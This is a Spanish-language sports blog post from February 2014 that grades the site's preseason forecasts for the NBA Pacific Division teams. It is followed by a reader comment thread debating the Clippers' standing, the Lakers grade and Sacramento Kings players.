Revisando pronósticos: Pacific

25 de February de 2014 por TheDeerHunter

GOLDEN STATE WARRIORS

Pronóstico Septiembre 2013: 4º en el Oeste (50-32). Semifinales de Conferencia.
Probabilidad de acierto: Media-baja
Calificación pronóstico: C-

De nuevo el extraño comportamiento inter-conferencias nos deja en evidencia. Los Warriors, victoria más o menos, se aproximan mucho al balance que pronosticamos. Lo que nadie podía imaginar  es que con casi un 60% de victorias se sufriría para asegurar lapostemporada. Así son las cosas.

En cualquier caso tanto en el análisis, como en los comentarios generales del blog a principio de curso se utilizaba de forma masiva la coletilla “el mejor X”. El mejor quinteto del Oeste, la mejor plantilla de la liga… Nos atrevíamos a escribir “Ningún equipo de la NBA puede superar al cinco inicial que forman Curry, Thompson, Iguodala, Lee y Bogut, más Barnes de sexto hombre”“la mejor combinación de exteriores en un backourt de la historia” (WTF!!). No en vano los Warriors se ganaron las máximas expectativas deslumbrándonos como pocos durante las eliminatorias del año pasado y después parecían haberse reforzado estupendamente. ¿Opciones reales de ganar el campeonato? Esa era nada menos que la pregunta que nos hacíamos.

Ahora paladeamos el sabor amargo de la decepción ante una temporada regular que en realidad es superior a la pasada. Las sensaciones no son tan buenas por el carácter frágil y errático del equipo. Una canción que ya ha sonado en un lugar acostumbrado a las fiestas (baloncestísticas) más excesivas pero también a las peores resacas.

Nuestro principal temor a principio de curso era la posible fragilidad física, con una plantilla cargada de antecedentes de lesiones. Han sufrido alguna, como casi todo el mundo, pero ese no ha sido ni remotamente el mayor de sus problemas. Prácticamente nadie ha brillado al nivel que sabemos que es capaz de hacerlo. Curry, Lee y Bogut se han parecido ocasionalmente a la mejor versión de sí mismos pero no con la regularidad deseada, Iguodala y Klay Thompson simplemente han cumplido, Barnes es una de las mayores decepciones individuales del curso, Jermaine ha sufrido problemas de todo tipo, Speights ha estado perdidísimo la mayor parte de la campaña, Draymond Green y Bazemore sólo brillaron en las pachangas de verano, Nedovic apenas ha contado… Evidentemente Marc Jackson no ha dado con la tecla para sacar todo el jugo a la amplia plantilla que tenía.

A todo esto se añade la tendecia a dejarse llevar durante varias fases de los encuentros como si creyeran que siempre van a ser capaces de lograr remontadas épicas. Parece que tengan muchas ganas de complicarse la vida. Esta última frase es el resumen perfecto de lo que resultando el curso para ellos.

En cualquier caso, suponiendo máxima motivación en el cruce (asumiendo que se clasifiquen) son un rival peligrosísimo. Son perfectamente capaces de alcanzar esa segunda ronda que fijamos al principio pero transmiten demasiadas dudas como para contar con ellos más lejos.

LOS ANGELES CLIPPERS

Pronóstico Septiembre 2013: 5º-6º del Oeste (unas 50 victorias). Primera ronda de playoffs.
Probabilidad de acierto: Baja
Calificación pronóstico: D

Es público y notorio que nuestro análisis siempre me pareció desacertado tanto en la forma como en el fondo. Los Clippers, a pesar de arrastrar varias lesiones significativas, se han movido durante todo el curso cerca del 70% de victorias en un frente de batalla tan duro como es el Oeste, jugando francamente bien. Varias de sus contadas derrotas se han producido por pura mala suerte en diferencias mínimas o directamente por alguna que otra decisión cuestionable de los árbitros. A diferencia de otros equipos, la mayoría de jugadores han rendido entre bien y muy bien, y alguno se ha revalorizado como pocos creíamos que podrían hacerlo a estas alturas.

En nuestro análisis criticábamos con dureza su nivel defensivo (aquello de“Defensivamente es un equipo que dejará mucho que desear”) pero los hechos juegan a su favor. No son los Celtics pero cumplen lo suficiente como para sumar uno de los mejores diferenciales ataque-defensa de la liga. Con ese ritmo tan rápido no es fácil limitar los puntos encajados. La mano de Doc Rivers va notándose un poco más cada día y son considerados abiertamente como aspirantes al trono del Oeste.

Dos all-star y dos aspirantes teóricos al MVP. Chris Paul sigue siendo el líder y mejor jugador pero en su larga ausencia Blake Griffin ha recogido el testigo como ni los más optimistas imaginábamos. Jamal Crawford sigue viviendo su segunda juventud como máximo aspirante a mejor 6º hombre y cuentan con hasta 3 grandes revelaciones del curso: DeAndre Jordan (cita: “Llama la atención los galones que le dan a pesar de ser incapaz de defender a buenos internos y convertirse en un riesgo severo con la pelota en las manos”),  que promedia dobles-dobles obra y gracia de la influencia de Rivers, J.J Redick (cita: “buen defensor y poco más”), que protagoniza la mejor temporada de su vida aunque también una de las más infaustas por las lesiones, y Darren Colison (cita:“No es un creador de juego eficaz ni un anotador completo pero saliendo de la banca sus defectos se verán disimulados”), que ha adquirido un protagonismo inesperado me temo que incluso de titular.

Como aspecto negativo hay que destacar que la plantilla no ha quedado tan compensada como alguno defendíamos y las lesiones han obligado a la gerencia a moverse. Ni Dudley ni Barnes han terminado de adueñarse de la posición de alero y tanto Mullens, como Jamison y Bullock apenas han contado. De hecho, los dos primeros han salido y el otro a punto estuvo de seguirles. Green sí que ha entrado en la rotación pero ya sabemos lo que ofrece, intensa defensa pero no talento.

A pesar de todo, en esta conferencia nadie está libre de atragantarse en una primera ronda pues, con total seguridad, todos los rivales van a ser temibles. Las lesiones también son un factor y no hay buenos presagios en ese sentido. En cualquier caso, en condiciones normales este equipo debe de aspirar como mínimo a semifinales de conferencia para pelear duro por meterse en la final del Oeste. Quién sabe si por algo más.

LOS ANGELES LAKERS

Pronóstico Septiembre 2013: 10º del Oeste (39-43). Fuera de Playoffs.
Probabilidad de acierto: Media-Alta
Calificación pronóstico: B

“Si por el contrario su nivel (ref. a Kobe) no es óptimo o recayese, los Lakers pasarían a ser uno de los 5 peores equipos de la liga.” Está claro que cualquier objetivo positivo dependía casi exclusivamente de la, quizá demasiado optimista, vuelta del mejor Kobe Bryant. La franquicia de dorado y púrpura había confeccionado sutilmente un proyecto pensando exclusivamente en el futuro. Mínimo compromiso salarial a costa de la competitividad inmediata y a pescar a partir del verano que viene tanto vía draft como mercado de agentes libres. En la mente de la directiva imagino que el factor Bryant no es que les trajera sin cuidado pero quizá preferían que interfiriera lo mínimo posible. Uno quiere pensar que la razón de mantener a D’Antoni en el cargo era exclusivamente para evitar quemar un nuevo entrenador antes de tiempo.

Con Nash y Kobe lesionados, ninguno esperábamos gran cosa al principio de curso. En cambio, lo de “presuponemos que van a ser un coladero” sí lo teníamos bastante claro. Sorprendentemente, el equipo se destapó con un gran rendimiento ofensivo, especialmente por parte del banquillo. Fue el más fuerte de la liga durante muchas semanas (¿quién lo hubiera dicho?). Numerosos aficionados amarillos, liberados por una vez de la presión resultadista, llegamos a disfrutar del inesperado espectáculo como no habíamos imaginado.

En el mejor momento todo se derrumbó. Coincidiendo con el regreso de Kobe y cerca de las plazas de playoffs el equipo se quedaba sin bases por lesión de Blake y Farmar (que venían haciendo un temporadón) más la ya conocida de Nash. La Mamba volvía renqueante y debía ponerse a dirigir. No funcionó y volvía a caer lesionado tras 6 partidos y una polémica renovación. En ese impás el peso de la lógica multiplicó las derrotas. Si el equipo tenía problemas de efectivos D’Antoni los agravó marginando de la manera más injusta a Kaman y Hill. Cuando Pau parecía volver a rendir como hacía años volvían las quinielas de traspaso. Un absoluto desastre… en parte. Porque ¿se necesitan más motivos para ponerse a tankear vilmente?

Nuestro análisis no prevía exactamente tanta calamidad. Jamás pensamos que diríamos esto pero los Lakers se han ganado a pulso ser el peor equipo del Oeste. Objetivo cumplido.

PHOENIX SUNS

Pronóstico Septiembre 2013: Penúltimos del Oeste. Con suerte alcanzarán las 30 victorias.
Probabilidad de acierto: Nula
Calificación pronóstico: F

Épic fail pero no sólo nuestro. Se consideraba a los Suns como uno de los grandes tankeadores de los últimos tiempos. Equipo joven, corto de efectivos y aparentemente poco sobrado de talento. Por si alguno tenía dudas hacia qué dirección se movían nada más comenzar el curso traspasaban a Gortat a cambio de una ronda protegida nada más. Si alguien entonces tenía más fe que nosotros en sus posibilidades decidió callar para siempre.

Seguramente algo falló en las previsiones de la directiva. Para empezar el novato téctico Jeff Hornacek, al que seguramente habían contratado sólo para aguantar el chaparrón, demostró ser más listo que el hambre. Justo como cuando era jugador. Por su parte, los jóvenes no tenían la menor intención de perder todos los partidos que querían sus jefes y demostraron ser mucho mejores de lo que nadie imaginábamos. Goran Dragic debía haber sido all-star; Eric Bledsoe se lesionó cuando venía haciendo números similares o mejores; Channing Frye ha recordado al de sus mejores días; espléndido rendimiento de los hermanos Morris, de Miles Plumlee, de PJ Tucker, qué decir de Gerald Green… Sólo podemos encontrar “peros” en la lesión de Bledsoe y en la elección de Alex Len, que apenas ha contado y que ha sufrido serios problemas físicos todo el año.

Como pasa en este tipo de casos cuesta creer que todo esto no sea simplemente el sueño de una noche de verano. Durante algún tramo de la campaña ha dado la impresión de que iban irremediablemente para abajo. Tampoco debería de haber extrañado a nadie. Sin embargo, una y otra vez ellos se han empeñado en demostrar que van en serio y que pueden ser un equipo tan peligroso como cualquiera… o quizá más, porque no tienen nada que perder.

Reconocemos nuestro error y nos quitamos el sombrero.

SACRAMENTO KINGS

Pronóstico Septiembre 2013: 33-49. Últimos o penúltimos de conferencia.
Probabilidad de acierto: Alta
Calificación pronóstico: B+

También tenemos nuestro particular especialista en los Kings y se nota que sabía de lo que hablaba cuando analizó las posibilidades del equipo. Los Kings, a buen seguro, van a quedar muy cerca de la última plaza de su conferencia y también del balance que pronosticamos. Por otro lado las cosas no han salido exactamente como teníamos pensado, concretamente en lo relacionado con las jerarquías del equipo. Luego lo veremos.

La frase “Seguramente a lo largo del año veamos algunos traspasos” fue totalmente premonitoria. No cabe duda de que se han movido mucho y, si bien, los resultados no han mejorado radicalmente, al menos sí se ha notado un cambio de mentalidad respecto a la era Maloof. Fue un gran acierto fichar a Rudy Gay. El precio parecía nominalmente elevado porque pensábamos que Greivis Vasquez podía contribuir a reverdecer viejos laureles en la capital de California. Finalmente el venezolano ha sido otra de las grandes decepciones del presente curso, así que teniendo en cuenta como ha venido jugando Gay, nadie le echará en falta.

Tampoco McLemore ha logrado ser el tercer pilar que señálabamos para cimentar el proyecto. En su caso, al menos, se ha mantenido la confianza despejándole la competencia y es que aunque parezca mentira Marcus Thornton llegó a quitarle la titularidad antes de ser traspasado, más por demérito del rookie que por méritos reseñables del propio Thornton.

Siguiendo en el capítulo de traspasos y también en el de decepciones, a cambio del (a nuestros ojos) alero titular Luc Mbah a Moute los Kings se hicieron pronto con Derrick Williams. Llegamos a pensar que el cambio de aires le podía resultar beneficioso pero tiene toda la pinta que este chico es definitivamente un bluf de cuidado. Ha contado en la rotación pero muy lejos del cartel que tenía cuando llegó a la liga e incluso de sus (contados) mejores momentos en Minesotta.

En lo positivo, además de Gay por fin hemos llegado a constatar la punta del iceberg de lo inmensamente bueno que puede llegar a ser DeMarcus Cousins. Además este año le hemos visto razonablemente tranquilito. Isaiah Thomas también ha brillado como nunca este curso. Su estilo de juego sin embargo no beneficia el sentido colectivo del equipo, uno de los más individualistas de toda la liga. Repasando los nombres que lo conforman se entiende perfectamente que sea así.

En definitiva, la temporada ha sido tan mala como esperábamos,pero al menos se aprecia intención de cambiar su naturaleza de equipo perdedor. La estabilidad institucional ayuda. Bienvenida sea.

Comenta

23 comentarios a esta entrada

  1. Esteban dice:
    #1

    Puse a los clippers 5tos o sextos y hoy estan quintos… tan rrado no estuvo

    El anslisi debe verse en el contexto, todos los especialistyas habklaban de lo bien que se habian reforzado los clippers y lo gran candidatos al anillo que eran, lo q no me parecio asi, no son una lacra, pero siguen estando a un paso largo de los spurs y el thunder, y se encuentran cabeza a cabeza con rockets y balzers para jugar primera ronda

    Alli puede pasar cualquier cosda, obviamente q el analisis inicial no contaba con glen davis y un renovado turkoglu, pero si los han fichado significa q muy bien cubiertas no estaban esas posiciones

    Como dije, quintos o sexto, al dia de hoy el acierto es total

      Citar

  2. TheDeerHunter dice:
    #2

    Te corrijo. Van cuartos y asegurando primera plaza de división que les coloca automáticamente en la parte alta del cuadro.
    El tono del análisis sigue siendo el que insistes en mantener… a ver si es que va a ser más importante la incorporación de turkoglu o la supuesta de Glen Davis que el mes y pico que se ha tirado de baja Chris Paul. Con Paul sano seguramente estarían más arriba, algo que por otro lado aún están a tiempo de ponerse. Los Clippers están jugando de fábula y ese no era ni remotamente el tono de tu análisis.
    Además ¿lejos de quien? Han mirado a la cara a todos y cada uno de los rivales directos… para una hipotética final de conferencia, no para quedar 5os o 6os.

    Por último, comentabas el otro día que tampoco ha sido para tanto el rendimiento de los fichajes, lo cual ya de por si es muy discutible… sin embargo obviaste que el principal fichaje de todos, que apenas valoras, fue el de Doc Rivers. Para muchos, entre los que me incluyo, es el mejor entrenador en activo quizá con la duda de Popovich.

      Citar

  3. Sancho88 dice:
    #3

    Los Clippers van a por el primer puesto de OKC. Ni de coña van a acabar 6º.

    “la mejor combinación de exteriores en un backourt de la historia” (WTF!!)

    Esto de GSW no lo decía yo, lo leí en la revista oficial de la NBA. Porque decían que Klay era de los mejores defensores perimetrales y juntosCurry y Thompson eran la mejor pareja anotadora de la liga, en triples, etc. Eran estadísticas muy específicas. Aún así, sí que son la mejor pareja base-escolta de la liga junto a Wall-Beal.

    Sobre lo de acierto medio-alto de Lakers y pronóstico bueno, creo que imposible. Ni décimos de conferencia ni 39 victorias. No sé por qué le pones esa nota al análisis. Los míos me los destrozas la nota por la posición de conferencia, y en este, que ni siquiera van a ser décimos ni mucho menos las 39 victorias les pones una B al análisis. No lo entiendo.

    Y, para acabar, no es cierto que McLemore esté haciendo una temporada de mierda. Si cogemos las estadísticas solo Oladipo y Burke lo están haciendo mejor que él de los top 10. Y del resto del draft cuento a MCW, Olynik, Antetokoumpo y Tim Hardaway. O sea, 6 tíos, y él es el séptimo del draft… calificar de fracaso su temporada no tiene sentido. No sé si has visto jugar a los Kings, pero te sugiero que los veas y te fijes en lo que hace McLemore sobre la pista. Un tío inteligente de pelotas. Hará carrera larga larga en la NBA. Te lo aseguro.

    Y Derrick Williams no es ningún pluff, está jugando muy bien y está siendo muy querido, valorado y respetado por la afición. Sale desde la segunda unidad y está siendo bastante regular aportando en ambas partes de la cancha. Es imparable en 1×1 cuando coge velocidad, tiene mucha habilidad botando, finaliza muchas veces sacando faltas y se adapta muy bien al ritmo del equipo. Un tipo que no está dando ningún problema en vestuarios y que aporta muchas cosas positivas.

    Ya sé que si miramos estadísticas me vas a destrozar, a sacar porcentajes, etc. pero yo te digo como juego de baloncesto lo que uno ve. Y me habré visto 40 partidos de los Kings este año seguro. Por eso te digo… Hay un núcleo de jugadores, Thomas-McLemore-Gay-Thompson-Cousins-Williams-Landry que aportan bien y que ahora se están conjuntando muy bien. El resto mierda. Vásquez no se adaptó al juego del equipo, McCallum decepción decepción decepción, es una puta mierda de jugador; Fredette lo de siempre, tiene 10 minutos buenos de basket cada 4 partidos. Es decir, si estás muy atento a los Kings, y te ves todos sus partidos, a lo mejor le ves una buena actuación de vez en cuando, pero para de contar. Es una mierda de jugador. Ni base, ni escolta, ni defiende, ni aguanta por físico a nadie, ni distribuye ni nada. Un desastre. Outlaw también muy muy flojo, Acy es solo energía, pero muy malo el chaval. Gray mejor ni hablar y a Evans todavía no le he visto.

    Ahora van a cortar a Fredette. Os acordáis que estos años siempre decíamos que había overbooking de bases-escoltas en Sacramento? Pues ahora solo están Thomas y McLemore. Se han ido Tyreke, Thornton, Fredette, Vásquez, Brooks, Douglas… No tienen suplentes. Es acojonante. McCallum va a jugar, eso sí, pero es un matao.

    Me tienen intrigado cómo piensan jugar lo que resta de temporada. Algunos partidos han puesto a Outlaw y Derrick Williams como doses jugando con cuatro grandes, así que supongo que habrá mucho de eso hasta final de temporada. Porque ni Terry ni Mason van a jugar

      Citar

  4. Jose Luis dice:
    #4

    Gracias Deer por el análisis 🙂 solo una puntualización veo yo, bueno quizá también lo de McLemore, pero no veo mucho los Kings y no puedo opinar.

    “Prácticamente nadie ha brillado al nivel que sabemos que es capaz de hacerlo. Curry, Lee y Bogut se han parecido ocasionalmente a la mejor versión de sí mismos pero no con la regularidad deseada, Iguodala y Klay Thompson simplemente han cumplido, Barnes es una de las mayores decepciones individuales del curso, Jermaine ha sufrido problemas de todo tipo, Speights ha estado perdidísimo la mayor parte de la campaña, Draymond Green y Bazemore sólo brillaron en las pachangas de verano, Nedovic apenas ha contado… Evidentemente Marc Jackson no ha dado con la tecla para sacar todo el jugo a la amplia plantilla que tenía.”

    Pues yo creo que están todos rindiendo a un nivel bastante alto, pero es que tampoco son jugadores brillantes. Curry es muy irregular, Thompson solo lanza, Barnes es físico y poco más, Iguodala lo mismo con algo más de creatividad, Lee un 20-10 hacenúmeros entrado en años, Bogut no tiene físico tras tantas lesiones… no sé qué le veíais a los Warriors, yo aún no estoy seguro de que entren en PO.

      Citar

  5. Esteban dice:
    #5

    TheDeerHunter:
    Te corrijo. Van cuartos

    pues yo los veo quintos:

    Thunder 43-14
    Spurs 40-16
    Rockets 38-18
    Blazers 38-18
    Clippers 39-20

    el ser cabeza de division les dara ventaja de campo pero no cambia su record, cuando digo lejos, es que en su record estan mucho mas cerca de Los Warriors en la clasifiacion (estan sextos), que de alcanzar el record de el Thunder, y algo menos lejos del de Spurs

    en comparacion con la psada temporada, esos clippers llegaron a ganar, cuantos fueron? 17 partidos corridos? fueron lideres del oeste en los primeros 30 juegos y su segunda unidad encabezada por bledsoe hoy casi jugadoir franquicia de suns, crawford hoy es titular y barnes hoy titular en este equipo

    que son menos que el año pasado, estoy convencido

      Citar

  6. Simon dice:
    #6

    Madremia… vaya análisis de los Suns… me consuela el hecho de que tengo la certeza de que hiciera quien hiciera el análisis los hubiera calificado igual o peor… pero es que a día de hoy miro la plantilla de Suns y sigo flipando de que estén tan arriba… Sin duda que el entrenador del año tiene que ser Hornacek.

      Citar

  7. heineken dice:
    #7

    El fanatismo anti-clippers de Esteban roza lo absurdo.

      Citar

  8. TheDeerHunter dice:
    #8

    Voy contestando… me gustaría no extenderme mucho pero me da que es imposible.
    @Sancho:
    Me sabe mal que digas que destrozo tus análisis. Si encima lo dices en la misma página donde tu análisis obtiene mejor nota directamente deja de tener remoto sentido. Paso página.
    Acerca de la frase de marras los Warriors. Sea tuya (en ningún momento he dicho que lo fuera) o sea de quien sea la frase era bastante fuerte en su día. Para mí un perímetro lo forman base,escolta y alero. Este perímetro de los Warriors para mí no empata de lejos con el TMC, como para nombrar otros que hicieron verdadera historia en la liga. Dudo mucho que te ofendas porque considere esa afirmación muy equivocada.
    ¿La nota de los Lakers? Para mí la nota en sí es algo secundario, pero te diré que valoré mucho eso de que sin una recuperación óptima de Kobe serían uno de los 5 peores de la liga. No es baladí, porque es algo con muy pocos precedentes en toda la historia de la liga. Además, en esencia acertaba porque les daba fuera de playoffs aún contando con Kobe… no sé, mis razones están ahí, pero todo es discutible.
    De McLemore, lo de la temporada de mierda no sé de donde te lo sacas. Los comentarios que hago son simplemente hechos. No son discutibles. No es el tercer pilar que tú, y quizá también yo, pensábamos. Y Thornton le quitó la titularidad. ¿En qué punto he dicho algo que no sea cierto?
    Sobre Derrick Williams, te recuerdo que fue 2a elección de su draft. Fue elegido (muy) por delante de Vucevic, Faried, Kanter, Leonard, Tristan, Valanciunas, Kemba, Klay, B. Knight, Tobias, Butler, Parsons, Isiah Thomas… Está jugando bien ¿comparado con qué? Ni siquiera consigo mismo. Ahora si en Sacramento le adoran eso ya no lo sé. Eso sí, admito que podría ser peor. Si borramos de nuestra mente su elección, al menos cumple un poquito.
    El resto no te discuto, me parece correcto. No en vano en uno de estos análisis que dices destrozo me enorgullezco de que tenemos nuestro propio especialista en los Kings. Igual no te has dado por aludido.

      Citar

  9. suffer dice:
    #9

    En mi opinion el 6 lugar en los Warriors es mas que suficiente para ellos, en mi opinion los warriors son un equipo de post-temporada, no para regular, el porque por lo mismo que se dijo arriba, las lesiones a lo largo de la temporada, la irregularidad de barnes, klay, e iggy se puede ver.

    Pero creo que todos estan de acuerdo que quedan entre los 8 equipos y en 7 partidos facilmente pueden vencer a cualquiera, o es mi opinion jaja. el equipo en nombres sobretodo ahora con los trades es bastante competitivo, ademas se puede decir que este año nunca el equipo ha estado completo, si no fue O’Neal, fue Iggy, ahora Bogut, por lo que todavia no se ve el potencial final del equipo.

    En fin no quiero dar vueltas en el punto de que los Warriors son un equipo peligroso aun cuando se diga que no han logrado llenar las espectativas y que todavia falta para verlos al 100%. Y ojala sea un Warriors vs Clippers, para seguir con el duelo que han tenido estos dos ultimos años

      Citar

  10. TheDeerHunter dice:
    #10

    @Jose Luis: En realidad tampoco es demasiado opinable. Es una cuestión de comparar el rendimiento de la mayoría de ellos con temporadas pasadas. Para mí sí tenían y siguen teniendo un equipo excelente.
    @Esteban: Siguen siendo cuartos, igual que serían terceros, rozando el segundo puesto en la otra conferencia. Es irrelevante la manera con que lo veas, y además es muy oportunista porque han estado por encima de los Rockets prácticamente todo el curso. Yo que tú no me agarraría a un clavo ardiendo que cada momento que pasa quema más.
    Que son menos que el año pasado sólo lo ves tú. Y te refresco la memoria, Bledsoe promedió el año pasado 20 minutos por partido saliendo de titular sólo en 12 de ellos. Su impacto fue muy limitado, especialmente si lo comparas con Reddick este año. Willie Green salió 60 veces de titular jugando más o menos lo mismo en minutos que este año.
    El alero titular era Caron Butler… y según tú mismo ni Griffin ni DeAndré valían para tacos de escopeta. No sé qué me quieres vender ahora de que el año pasado…
    Ah, y en el banquillo ni me molesto en comentarte la diferencia.

      Citar

  11. Esteban dice:
    #11

    TheDeerHunter:
    @Jose Luis: En realidad tampoco es demasiado opinable. Es una cuestión de comparar el rendimiento de la mayoría de ellos con temporadas pasadas. Para mí sí tenían y siguen teniendo un equipo excelente.
    @Esteban: Siguen siendo cuartos, igual que serían terceros, rozando el segundo puesto en la otra conferencia. Es irrelevante la manera con que lo veas, y además es muy oportunista porque han estado por encima de los Rockets prácticamente todo el curso. Yo que tú no me agarraría a un clavo ardiendo que cada momento que pasa quema más.
    Que son menos que el año pasado sólo lo ves tú. Y te refresco la memoria, Bledsoe promedió el año pasado 20 minutos por partido saliendo de titular sólo en 12 de ellos. Su impacto fue muy limitado, especialmente si lo comparas con Reddick este año. Willie Green salió 60 veces de titular jugando más o menos lo mismo en minutos que este año.
    El alero titular era Caron Butler… y según tú mismo ni Griffin ni DeAndré valían para tacos de escopeta. No sé qué me quieres vender ahora de que el año pasado…
    Ah, y en el banquillo ni me molesto en comentarte la diferencia.

    si miras el analisis veras que es una comparacion entre temporadas, solo leelo y te daras cuenta que en mi opinion no mejoraban el equipo, collison es menos que bledsoe, o esa al menos es mi opinion

    crawford y barnes encabezaban una segunda unidad, y hoy por necesidad, la lesion de redick y lo malo de dudley, terminan siendo titulares,
    ni hablar de los fichajes de jamison y mullens, que ya fueron echados

    sobre el imapcto de bledsoe no comparto en absoluto, por algo los clippers lo intercambiaron sabiendo que seria imposible renovarlo, jugo una gran liga, y junto a crawford y barnes, encabezaron unas de las bancas mas efectivas en la temporada regular de las que tengo memoria

    ahora bueno, si fichan a glen davis, mejoran el juego interior de la temporada pasada, no voy a negarlo, lo mismo si turkoglu puede aportar lo que no aporta dudley

    en fin, el quinto puesto que detentan me parece el logico, podras creer lo que quieras, pero si jguaron 60 partdos de la regular y estan quintos, el analisis cuaja perfecto y gracias

    en todo caso, es casi un hecho que los clippers se mediran en primera ronda con rockets, blazers o warriors, y quiza puede ser favorito para pasar de ronda, pero lejos de ser algo facil y tendran una primera eliminatoria con al menos 6 juegos en el mejor de los casos

    no entendi lo que no te molestas en comentar el banquillo, entiendes que el de este año es mejor?
    bledsoe-crawford-barnes-odom-hollins o turiaf

    y el de este año collison-crawford (aunque ha jugado mas de titular 22 de 59)- dudley-mulles-hollins es mejor que el del año pasado?

    en fin, antes de los fichajes y con el equipo del año pasado, QUINTO PUESTO COMO SE PRONOSTICO

    el que esperaba otra cosa, que espere a Davis y a llorar a la inglesia…

      Citar

  12. Jose Luis dice:
    #12

    Yo la verdad es que estoy bastante más de acuerdo con Esteban. La plantilla es bastante peor, pero quizá Rivers pueda hacer la diferencia, como dije anteriormente.

      Citar

  13. Jose Luis dice:
    #13

    Bueno, ahora con Glen Davis quizá haya algo más de potencia en la segunda unidad.

      Citar

  14. TheDeerHunter dice:
    #14

    Estás haciendo trampas al solitario Esteban. En la comparación entre temporadas que tú comentas no puede entrar el Bledsoe de ésta. Tienes que mirar qué hizo el año pasado allí y con las cifras en la mano no sólo que Collison ha aportado más que Bledsoe el año pasado, sino también Reddick. El impacto de Bledsoe fue el que fue.
    También tienes que comparar la mejora de rendimiento de cada uno de los que ya estaban. Repito, Green haciendo lo mismo era titular indiscutible el año pasado. Ahora es el 10º hombre.
    Sólo hay un factor, que tú mismo reconoces y que en ningún caso tenías en cuenta en tu pronóstico (cosa lógica, por otro lado) Son las lesiones, que el año pasado sólo sufrieron al final. Con el mismo impacto de lesiones que, por ejemplo, Houston y Blazers, te lanzo una pregunta ¿Cuantas victorias más tendrían? O digamoslo de otra manera… sienta a Aldridge y a Harden un mes y pico a ver qué sucede. Es que si no se entiende eso…
    Lo del banco me refería obviamente a Rivers.

    Por último, Davis aún no ha fichado… así que tampoco te agarres a ese clavo. Si los Clippers suben ahora, que no te quepa duda que lo van a hacer, igual es porque juega un tal Chris Paul a diferencia del pasado mes.

      Citar

  15. rumbero dice:
    #15

    @Sancho: ¿Tan mala es la temporada de Fredette para decir que es una mierda de jugador? Pero si el chaval no juega y cuando sale mete lo que tira. Que no defiende un pimiento y no iba a ser esa estrella de la NCAA ya lo asumimos pero a partir de ahí (y habiendo visto poco a los Kings) me parece que es un tío que cumple con lo que promete. Yo aún creo que en otro equipo, con un rol de tirador desde el banquillo y una aportación de minutos regular puede acabar encontrando perfectamente su hueco en la NBA.
    Lo que no me cuadra es defender tanto la temporada de McLemore por hacer de anti-Jimmer: defender bien, manejar el balón lo justito y tirar de puta pena. Otra cosa es que para el núcleo que quieren formar en Sacramento con Thomas-Gay-Cousins asumiendo casi todo el peso ofensivo del equipo puede ser mucho más valioso un proyecto de escolta como McLemore, con el que estoy de acuerdo que va a hacer carrera pero que su temporada a día de hoy se llevaría un aprobado justito con suerte.

      Citar

  16. Esteban dice:
    #16

    TheDeerHunter:
    Estás haciendo trampas al solitario Esteban. En la comparación entre temporadas que tú comentas no puede entrar el Bledsoe de ésta. Tienes que mirar qué hizo el año pasado allí y con las cifras en la mano no sólo que Collison ha aportado más que Bledsoe el año pasado, sino también Reddick. El impacto de Bledsoe fue el que fue.
    También tienes que comparar la mejora de rendimiento de cada uno de los que ya estaban. Repito, Green haciendo lo mismo era titular indiscutible el año pasado. Ahora es el 10º hombre.
    Sólo hay un factor, que tú mismo reconoces y que en ningún caso tenías en cuenta en tu pronóstico (cosa lógica, por otro lado) Son las lesiones, que el año pasado sólo sufrieron al final. Con el mismo impacto de lesiones que, por ejemplo, Houston y Blazers, te lanzo una pregunta ¿Cuantas victorias más tendrían? O digamoslo de otra manera… sienta a Aldridge y a Harden un mes y pico a ver qué sucede. Es que si no se entiende eso…
    Lo del banco me refería obviamente a Rivers.

    Por último, Davis aún no ha fichado… así que tampoco te agarres a ese clavo. Si los Clippers suben ahora, que no te quepa duda que lo van a hacer, igual es porque juega un tal Chris Paul a diferencia del pasado mes.

    es que Aldrigue esta lesionado!!!!

    en cuanto a la lesion de CP3, sirvio para un despegue de Griffin que no venia teniendo, y dado que ganaron varios juegos in el, creo que todos podemos coincidir en que no les afecto, al contrario, les dio una oportunidad

    aquí mismo se ha dicho que el equipo funciono perfecto sin paul y que con el ahora eran mejores, el record prácticamente no se afecto, ni con CP3 eran terceros en la clasificacion, ni sin el quedaron 6tos, se han movidmo siempre en el mismo porcentaje de victorias y puestos

    ayer ganaron tanto Rockets como Blazers y se van a 39-18, mientras que clippers están 39-20, y van 60 partidos de la regular, no dos dias

    lo de oportunismo resulta gracioso, puesto que no he sido yo quien eligió el momento de hacer la valoración de los análisis, sino tu mismo deer…

      Citar

  17. TheDeerHunter dice:
    #17

    Pero ¿Cuantos partidos se ha perdido Aldridge esta temporada?
    ¿Quien ha dicho que los Clippers sin Chris Paul sean perfectos? Se ha perdido casi un tercio de los 60 partidos de la temporada. Si tú no crees que eso afecte a un equipo en el Oeste aquí paramos de debatir, porque me parece el súmmum de la negación.
    La revisión de los pronósticos se hace todos los años por estas fechas.

      Citar

  18. Esteban dice:
    #18

    Si se hace todos los años no me culpes a mi que en estas fchas los rockrts estan 2 juegos por encima de la clasificacion, i

      Citar

  19. Sancho88 dice:
    #19

    Rumbero, Fredette es malísimo. Vale pare basket fiba pero en la NBA nada de nada. Malo malo malo con avaricia. Malíisimo. De verdad. Que no os vendan la moto de sus porcentajes de triples. IQ nada. Absolutamente nada. De verdad. Malísimo. Creedme.

    Y Deer, lo que digo de la nota de los análisis es por eso, que la nota de Lakers no va en sintonía con la clasificación y el pronóstico de victorias, y por ese motivo a mí me has puesto malas notas en otros análisis, por el decanaje de victorias/posisción, por el tema de no calibrar bien cómo iba a darse la temporada a nivel porcentajes/posiciones en conferencias. Por eso me quejo. Ni mucho menos me quejo de la nota de Kings ni de nada más. Es específicamente referido a eso. Me parece una nota demasiado alta para el análisis de Lakers, eso es todo. Si llegan a 30 victorias ya se pueden dar con un canto en los dientes. Denise pronosticó 39 y 10º, y van a ganar 30 y van a quedar los 15. Eso no se merece una B. Es mi opinión.

    Sí que me doy por aludido con los Kings hombre, y me alagan tus comentarios de tratarme de experto. Tampoco es para tanto. Simplemente les he visto mucho esta temporada por las tomas de biberón de mi chiquilla y digo lo que veo, así de simple. McLemore va a ser un gran jugador. Si quieres nos empecinamos en sus estadísticas, pero yo te digo lo que hay, un pedazo de jugador de baloncesto. Buenísimo de verdad.

    Derrick es bueno, obviamente no para ser un pick 2, eso es obvio, pero yo cuento con él en el futuro de los Kings. Es currante, carácter de equipo, no es abusón… no sé, a mí me gusta mucho.

